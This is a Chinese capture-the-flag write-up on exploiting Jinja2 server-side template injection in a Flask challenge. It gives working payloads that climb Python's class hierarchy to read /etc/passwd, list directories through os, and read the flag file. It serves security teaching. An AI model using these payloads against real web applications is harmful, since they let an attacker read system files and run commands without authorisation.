攻防世界-Web_python_template_injection详解

Web_python_template_injection

在做这道题之前如果大家不懂可以先看一看这篇文章:
从零学习flask模板注入

基础知识

在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

1.判断有无模板注入
payload

http://220.249.52.133:53362/{{7+7}}

攻防世界-Web_python_template_injection详解_第1张图片
查看全局变量

http://220.249.52.133:53362/{{config}}

攻防世界-Web_python_template_injection详解_第2张图片

基础知识:
文件包含:是通过python的对象的继承来一步步实现文件读取和命令执行的的。
思路:找到父类–>寻找子类–>找关于命令执行或者文件操作的模块。

几个魔术方法

__class__  返回类型所属的对象
__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__   返回该对象所继承的基类  // __base__和__mro__都是用来寻找基类的

__subclasses__   每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__  类的初始化方法
__globals__  对包含函数全局变量的字典的引用

寻找可用引用
payload:

{{''.__class__.__mro__[2].__subclasses__()}}

攻防世界-Web_python_template_injection详解_第3张图片
可以看到有一个type file类型(可以进行文件读取)

{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}

[40]是tupe file类型出现位置(从0开始的位置)

攻防世界-Web_python_template_injection详解_第4张图片

可以看到有一个 类型(可以进行命令执行)

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

攻防世界-Web_python_template_injection详解_第5张图片

本题我们主要用到命令执行,直接利用上面的payload即可

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

[71]为出现位置
攻防世界-Web_python_template_injection详解_第6张图片
读取flag

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

攻防世界-Web_python_template_injection详解_第7张图片
flag:
ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

你可能感兴趣的:(攻防世界web高手进阶,攻防世界)